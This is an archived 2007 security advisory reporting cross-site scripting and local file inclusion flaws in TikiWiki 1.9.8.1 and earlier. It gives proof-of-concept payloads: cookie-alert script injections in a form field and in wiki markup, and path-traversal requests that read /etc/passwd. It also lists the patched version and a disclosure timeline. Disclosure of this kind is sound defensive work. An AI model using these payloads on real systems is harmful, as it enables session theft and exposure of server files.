Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Wiki, Collaborationware :: tb13146.htm

TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion



TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion



=====================================================================TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
=====================================================================
Author:          L4teral 
Impact:          Cross Site Scripting
                 Local File Inclusion
Status:          patch available


------------------------------
Affected software description:
------------------------------

Application:     TikiWiki
Version:         <= 1.9.8.1
Vendor: http://tikiwiki.org 

Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.


--------------
Vulnerability:
--------------

XSS:
1. The password reminder page is vulnerable to cross site scripting.

2. Script code can be embedded into wiki-pages.

3. The script db/tiki-db.php is vulnerable to cross site scripting

LFI:
4.
The script db/tiki-db.php is vulnerable to local file inclusion attacks.

5.
The script tiki-imexport_languages.php is vulnerable to local file
inclusion attacks.


------------
PoC/Exploit:
------------

XSS:
1.
enter in the form: 

URL: http://localhost/tikiwiki/tiki-remind_password.php 
POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
          remind=send+me+my+password

2.
create wiki page with:
{img src=javascript:alert(document.cookie) }

3.
http://localhost/tikiwiki/tiki-index.php?local_php= 

LFI:
4.
register_globals required:
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd 
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd 

5.
feature lang_use_db(use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php 
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import


---------
Solution:
---------

update to 1.9.8.2 or above:
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549

---------
Timeline:
---------

23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH